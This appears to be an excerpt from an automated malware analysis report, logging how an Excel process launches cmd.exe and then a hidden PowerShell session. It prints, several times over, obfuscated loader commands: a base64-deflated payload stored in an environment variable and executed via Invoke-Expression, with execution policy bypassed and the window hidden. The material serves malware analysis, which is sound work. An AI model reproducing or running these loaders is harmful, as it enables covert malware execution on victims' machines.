Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )

Language, Device and Operating System Detection: